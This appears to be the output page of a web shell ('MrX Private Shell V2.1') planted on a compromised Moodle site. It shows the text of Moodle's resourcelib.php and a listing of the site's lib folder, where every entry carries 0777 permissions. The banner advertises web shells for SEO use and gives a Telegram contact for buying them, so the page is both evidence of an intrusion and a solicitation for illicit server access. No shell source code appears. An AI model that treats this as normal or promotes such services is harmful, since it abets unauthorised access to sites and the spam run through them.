__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <http://www.gnu.org/licenses/>.
/**
* Recourse module like helper functions
*
* @package core
* @subpackage lib
* @copyright 2009 Petr Skoda (http://skodak.org)
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
defined('MOODLE_INTERNAL') || die();
/** Try the best way */
define('RESOURCELIB_DISPLAY_AUTO', 0);
/** Display using object tag */
define('RESOURCELIB_DISPLAY_EMBED', 1);
/** Display inside frame */
define('RESOURCELIB_DISPLAY_FRAME', 2);
/** Display normal link in new window */
define('RESOURCELIB_DISPLAY_NEW', 3);
/** Force download of file instead of display */
define('RESOURCELIB_DISPLAY_DOWNLOAD', 4);
/** Open directly */
define('RESOURCELIB_DISPLAY_OPEN', 5);
/** Open in "emulated" pop-up without navigation */
define('RESOURCELIB_DISPLAY_POPUP', 6);
/** Legacy files not needed or new resource */
define('RESOURCELIB_LEGACYFILES_NO', 0);
/** Legacy files conversion marked as completed */
define('RESOURCELIB_LEGACYFILES_DONE', 1);
/** Legacy files conversion in progress*/
define('RESOURCELIB_LEGACYFILES_ACTIVE', 2);
/**
* Try on demand migration of file from old course files
* @param string $filepath old file path
* @param int $cmid migrated course module if
* @param int $courseid
* @param string $component
* @param string $filearea new file area
* @param int $itemid migrated file item id
* @return mixed, false if not found, stored_file instance if migrated to new area
*/
function resourcelib_try_file_migration($filepath, $cmid, $courseid, $component, $filearea, $itemid) {
$fs = get_file_storage();
if (stripos($filepath, '/backupdata/') === 0 or stripos($filepath, '/moddata/') === 0) {
// do not steal protected files!
return false;
}
if (!$context = context_module::instance($cmid)) {
return false;
}
if (!$coursecontext = context_course::instance($courseid)) {
return false;
}
$fullpath = rtrim("/$coursecontext->id/course/legacy/0".$filepath, '/');
do {
if (!$file = $fs->get_file_by_hash(sha1($fullpath))) {
if ($file = $fs->get_file_by_hash(sha1("$fullpath/.")) and $file->is_directory()) {
if ($file = $fs->get_file_by_hash(sha1("$fullpath/index.htm"))) {
break;
}
if ($file = $fs->get_file_by_hash(sha1("$fullpath/index.html"))) {
break;
}
if ($file = $fs->get_file_by_hash(sha1("$fullpath/Default.htm"))) {
break;
}
}
return false;
}
} while (false);
// copy and keep the same path, name, etc.
$file_record = array('contextid'=>$context->id, 'component'=>$component, 'filearea'=>$filearea, 'itemid'=>$itemid);
try {
return $fs->create_file_from_storedfile($file_record, $file);
} catch (Exception $e) {
// file may exist - highly unlikely, we do not want upgrades to stop here
return false;
}
}
/**
* Returns list of available display options
* @param array $enabled list of options enabled in module configuration
* @param int $current current display options for existing instances
* @return array of key=>name pairs
*/
function resourcelib_get_displayoptions(array $enabled, $current=null) {
if (is_number($current)) {
$enabled[] = $current;
}
$options = array(RESOURCELIB_DISPLAY_AUTO => get_string('resourcedisplayauto'),
RESOURCELIB_DISPLAY_EMBED => get_string('resourcedisplayembed'),
RESOURCELIB_DISPLAY_FRAME => get_string('resourcedisplayframe'),
RESOURCELIB_DISPLAY_NEW => get_string('resourcedisplaynew'),
RESOURCELIB_DISPLAY_DOWNLOAD => get_string('resourcedisplaydownload'),
RESOURCELIB_DISPLAY_OPEN => get_string('resourcedisplayopen'),
RESOURCELIB_DISPLAY_POPUP => get_string('resourcedisplaypopup'));
$result = array();
foreach ($options as $key=>$value) {
if (in_array($key, $enabled)) {
$result[$key] = $value;
}
}
if (empty($result)) {
// there should be always something in case admin misconfigures module
$result[RESOURCELIB_DISPLAY_OPEN] = $options[RESOURCELIB_DISPLAY_OPEN];
}
return $result;
}
/**
* Tries to guess correct mimetype for arbitrary URL
* @param string $fullurl
* @return string mimetype
*/
function resourcelib_guess_url_mimetype($fullurl) {
global $CFG;
require_once("$CFG->libdir/filelib.php");
if ($fullurl instanceof moodle_url) {
$fullurl = $fullurl->out(false);
}
$matches = null;
if (preg_match("|^(.*)/[a-z]*file.php(\?file=)?(/[^&\?#]*)|", $fullurl, $matches)) {
// remove the special moodle file serving hacks so that the *file.php is ignored
$fullurl = $matches[1].$matches[3];
}
if (preg_match("|^(.*)#.*|", $fullurl, $matches)) {
// ignore all anchors
$fullurl = $matches[1];
}
if (strpos($fullurl, '.php')){
// we do not really know what is in general php script
return 'text/html';
} else if (substr($fullurl, -1) === '/') {
// directory index (http://example.com/smaples/)
return 'text/html';
} else if (strpos($fullurl, '//') !== false and substr_count($fullurl, '/') == 2) {
// just a host name (http://example.com), solves Australian servers "audio" problem too
return 'text/html';
} else {
// ok, this finally looks like a real file
$parts = explode('?', $fullurl);
$url = reset($parts);
return mimeinfo('type', $url);
}
}
/**
* Looks for the extension.
*
* @param string $fullurl
* @return string file extension
*/
function resourcelib_get_extension($fullurl) {
if ($fullurl instanceof moodle_url) {
$fullurl = $fullurl->out(false);
}
$matches = null;
if (preg_match("|^(.*)/[a-z]*file.php(\?file=)?(/.*)|", $fullurl, $matches)) {
// remove the special moodle file serving hacks so that the *file.php is ignored
$fullurl = $matches[1].$matches[3];
}
$matches = null;
if (preg_match('/^[^#\?]+\.([a-z0-9]+)([#\?].*)?$/i', $fullurl, $matches)) {
return strtolower($matches[1]);
}
return '';
}
/**
* Returns image embedding html.
* @param string $fullurl
* @param string $title
* @return string html
*/
function resourcelib_embed_image($fullurl, $title) {
$code = '';
$code .= '<div class="resourcecontent resourceimg">';
$code .= "<img title=\"".s(strip_tags(format_string($title)))."\" class=\"resourceimage\" src=\"$fullurl\" alt=\"\" />";
$code .= '</div>';
return $code;
}
/**
* Returns general link or pdf embedding html.
* @param string $fullurl
* @param string $title
* @param string $clicktoopen
* @return string html
*/
function resourcelib_embed_pdf($fullurl, $title, $clicktoopen) {
global $CFG, $PAGE;
$code = <<<EOT
<div class="resourcecontent resourcepdf">
<object id="resourceobject" data="$fullurl" type="application/pdf" width="800" height="600">
<param name="src" value="$fullurl" />
$clicktoopen
</object>
</div>
EOT;
// the size is hardcoded in the boject obove intentionally because it is adjusted by the following function on-the-fly
$PAGE->requires->js_init_call('M.util.init_maximised_embed', array('resourceobject'), true);
return $code;
}
/**
* Returns general link or file embedding html.
* @param string $fullurl
* @param string $title
* @param string $clicktoopen
* @param string $mimetype
* @return string html
*/
function resourcelib_embed_general($fullurl, $title, $clicktoopen, $mimetype) {
global $CFG, $PAGE;
if ($fullurl instanceof moodle_url) {
$fullurl = $fullurl->out();
}
$title = s($title);
// Always use iframe embedding because object tag does not work much,
// this is ok in HTML5.
$code = <<<EOT
<div class="resourcecontent resourcegeneral">
<iframe id="resourceobject" src="$fullurl" title="$title">
$clicktoopen
</iframe>
</div>
EOT;
// the size is hardcoded in the boject obove intentionally because it is adjusted by the following function on-the-fly
$PAGE->requires->js_init_call('M.util.init_maximised_embed', array('resourceobject'), true);
return $code;
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| adodb | Folder | 0777 |
|
|
| ajax | Folder | 0777 |
|
|
| amd | Folder | 0777 |
|
|
| antivirus | Folder | 0777 |
|
|
| aws-sdk | Folder | 0777 |
|
|
| behat | Folder | 0777 |
|
|
| bennu | Folder | 0777 |
|
|
| classes | Folder | 0777 |
|
|
| db | Folder | 0777 |
|
|
| ddl | Folder | 0777 |
|
|
| dml | Folder | 0777 |
|
|
| dtl | Folder | 0777 |
|
|
| editor | Folder | 0777 |
|
|
| emoji-data | Folder | 0777 |
|
|
| evalmath | Folder | 0777 |
|
|
| external | Folder | 0777 |
|
|
| filebrowser | Folder | 0777 |
|
|
| filestorage | Folder | 0777 |
|
|
| fonts | Folder | 0777 |
|
|
| form | Folder | 0777 |
|
|
| geopattern-php | Folder | 0777 |
|
|
| giggsey | Folder | 0777 |
|
|
| Folder | 0777 |
|
||
| grade | Folder | 0777 |
|
|
| guzzlehttp | Folder | 0777 |
|
|
| html2text | Folder | 0777 |
|
|
| htmlpurifier | Folder | 0777 |
|
|
| jmespath | Folder | 0777 |
|
|
| jquery | Folder | 0777 |
|
|
| laravel | Folder | 0777 |
|
|
| lti1p3 | Folder | 0777 |
|
|
| ltiprovider | Folder | 0777 |
|
|
| markdown | Folder | 0777 |
|
|
| maxmind | Folder | 0777 |
|
|
| minify | Folder | 0777 |
|
|
| mlbackend | Folder | 0777 |
|
|
| mustache | Folder | 0777 |
|
|
| nikic | Folder | 0777 |
|
|
| openspout | Folder | 0777 |
|
|
| pear | Folder | 0777 |
|
|
| php-css-parser | Folder | 0777 |
|
|
| php-di | Folder | 0777 |
|
|
| php-enum | Folder | 0777 |
|
|
| php-jwt | Folder | 0777 |
|
|
| phpmailer | Folder | 0777 |
|
|
| phpspreadsheet | Folder | 0777 |
|
|
| phpunit | Folder | 0777 |
|
|
| phpxmlrpc | Folder | 0777 |
|
|
| plist | Folder | 0777 |
|
|
| polyfills | Folder | 0777 |
|
|
| portfolio | Folder | 0777 |
|
|
| psr | Folder | 0777 |
|
|
| ralouphie | Folder | 0777 |
|
|
| requirejs | Folder | 0777 |
|
|
| rtlcss | Folder | 0777 |
|
|
| scssphp | Folder | 0777 |
|
|
| simplepie | Folder | 0777 |
|
|
| slim | Folder | 0777 |
|
|
| spatie | Folder | 0777 |
|
|
| symfony | Folder | 0777 |
|
|
| table | Folder | 0777 |
|
|
| tcpdf | Folder | 0777 |
|
|
| templates | Folder | 0777 |
|
|
| testing | Folder | 0777 |
|
|
| tests | Folder | 0777 |
|
|
| userkey | Folder | 0777 |
|
|
| webauthn | Folder | 0777 |
|
|
| xapi | Folder | 0777 |
|
|
| xhprof | Folder | 0777 |
|
|
| xmldb | Folder | 0777 |
|
|
| yui | Folder | 0777 |
|
|
| yuilib | Folder | 0777 |
|
|
| zipstream | Folder | 0777 |
|
|
| UPGRADING.md | File | 26.35 KB | 0777 |
|
| accesslib.php | File | 184.94 KB | 0777 |
|
| adminlib.php | File | 398.39 KB | 0777 |
|
| apis.json | File | 7.09 KB | 0777 |
|
| apis.schema.json | File | 1.06 KB | 0777 |
|
| authlib.php | File | 46.33 KB | 0777 |
|
| badgeslib.php | File | 55.15 KB | 0777 |
|
| blocklib.php | File | 106.57 KB | 0777 |
|
| cacert.pem | File | 239.21 KB | 0777 |
|
| cacert.txt | File | 811 B | 0777 |
|
| clilib.php | File | 9.58 KB | 0777 |
|
| completionlib.php | File | 70.38 KB | 0777 |
|
| componentlib.class.php | File | 29.51 KB | 0777 |
|
| components.json | File | 3.98 KB | 0777 |
|
| conditionlib.php | File | 1.11 KB | 0777 |
|
| configonlylib.php | File | 8.19 KB | 0777 |
|
| cookies.js | File | 2.37 KB | 0777 |
|
| cronlib.php | File | 1.07 KB | 0777 |
|
| csslib.php | File | 6.81 KB | 0777 |
|
| csvlib.class.php | File | 17.72 KB | 0777 |
|
| customcheckslib.php | File | 1.5 KB | 0777 |
|
| datalib.php | File | 85.59 KB | 0777 |
|
| ddllib.php | File | 4.72 KB | 0777 |
|
| default.ttf | File | 502.23 KB | 0777 |
|
| deprecatedlib.php | File | 25.18 KB | 0777 |
|
| dmllib.php | File | 12.47 KB | 0777 |
|
| dtllib.php | File | 2.58 KB | 0777 |
|
| editorlib.php | File | 6.43 KB | 0777 |
|
| emptyfile.php | File | 809 B | 0777 |
|
| enrollib.php | File | 138.47 KB | 0777 |
|
| environmentlib.php | File | 58.32 KB | 0777 |
|
| excellib.class.php | File | 30.24 KB | 0777 |
|
| externallib.php | File | 9.54 KB | 0777 |
|
| filelib.php | File | 204.42 KB | 0777 |
|
| filterlib.php | File | 42.89 KB | 0777 |
|
| flickrclient.php | File | 10.1 KB | 0777 |
|
| flickrlib.php | File | 52.19 KB | 0777 |
|
| formslib.php | File | 151.53 KB | 0777 |
|
| gdlib.php | File | 17.71 KB | 0777 |
|
| googleapi.php | File | 9.48 KB | 0777 |
|
| gradelib.php | File | 62.29 KB | 0777 |
|
| graphlib.php | File | 86.81 KB | 0777 |
|
| grouplib.php | File | 59.67 KB | 0777 |
|
| index.html | File | 1 B | 0777 |
|
| installlib.php | File | 18.79 KB | 0777 |
|
| javascript-static.js | File | 42.38 KB | 0777 |
|
| javascript.php | File | 4.11 KB | 0777 |
|
| jslib.php | File | 4.21 KB | 0777 |
|
| jssourcemap.php | File | 2.51 KB | 0777 |
|
| ldaplib.php | File | 18.19 KB | 0777 |
|
| lexer.php | File | 15.92 KB | 0777 |
|
| licenselib.php | File | 12.42 KB | 0777 |
|
| licenses.json | File | 2.29 KB | 0777 |
|
| listlib.php | File | 29.37 KB | 0777 |
|
| mathslib.php | File | 4.47 KB | 0777 |
|
| messagelib.php | File | 32.76 KB | 0777 |
|
| modinfolib.php | File | 143.39 KB | 0777 |
|
| moodlelib.php | File | 359 KB | 0777 |
|
| myprofilelib.php | File | 18.35 KB | 0777 |
|
| navigationlib.php | File | 264.31 KB | 0777 |
|
| oauthlib.php | File | 24.97 KB | 0777 |
|
| odslib.class.php | File | 57.65 KB | 0777 |
|
| outputactions.php | File | 1.04 KB | 0777 |
|
| outputcomponents.php | File | 1.04 KB | 0777 |
|
| outputfactories.php | File | 1.04 KB | 0777 |
|
| outputfragmentrequirementslib.php | File | 1.04 KB | 0777 |
|
| outputlib.php | File | 11.99 KB | 0777 |
|
| outputrenderers.php | File | 1.04 KB | 0777 |
|
| outputrequirementslib.php | File | 1.04 KB | 0777 |
|
| pagelib.php | File | 91.58 KB | 0777 |
|
| pdflib.php | File | 10.11 KB | 0777 |
|
| phpminimumversionlib.php | File | 3.08 KB | 0777 |
|
| plagiarismlib.php | File | 3.38 KB | 0777 |
|
| plugins.json | File | 15.21 KB | 0777 |
|
| plugins.schema.json | File | 1.28 KB | 0777 |
|
| portfoliolib.php | File | 53.58 KB | 0777 |
|
| questionlib.php | File | 79.14 KB | 0777 |
|
| recaptchalib_v2.php | File | 6.53 KB | 0777 |
|
| requirejs.php | File | 7.4 KB | 0777 |
|
| resourcelib.php | File | 8.89 KB | 0777 |
|
| rsslib.php | File | 17.94 KB | 0777 |
|
| searchlib.php | File | 17.29 KB | 0777 |
|
| sessionlib.php | File | 4.86 KB | 0777 |
|
| setup.php | File | 43.98 KB | 0777 |
|
| setuplib.php | File | 62.59 KB | 0777 |
|
| soaplib.php | File | 5.28 KB | 0777 |
|
| statslib.php | File | 67.81 KB | 0777 |
|
| tablelib.php | File | 1.47 KB | 0777 |
|
| thirdpartylibs.xml | File | 31.13 KB | 0777 |
|
| tokeniserlib.php | File | 16.69 KB | 0777 |
|
| upgrade.txt | File | 180.01 KB | 0777 |
|
| upgradelib.php | File | 107.07 KB | 0777 |
|
| uploadlib.php | File | 1.9 KB | 0777 |
|
| validateurlsyntax.php | File | 23.05 KB | 0777 |
|
| wasmlib.php | File | 4.29 KB | 0777 |
|
| webdavlib.php | File | 69.59 KB | 0777 |
|
| weblib.php | File | 92.3 KB | 0777 |
|
| wiki_to_markdown.php | File | 13.08 KB | 0777 |
|
| wordlist.txt | File | 1.23 KB | 0777 |
|
| xhtml.xsl | File | 223 B | 0777 |
|
| xmlize.php | File | 8.82 KB | 0777 |
|
| xsendfilelib.php | File | 3.02 KB | 0777 |
|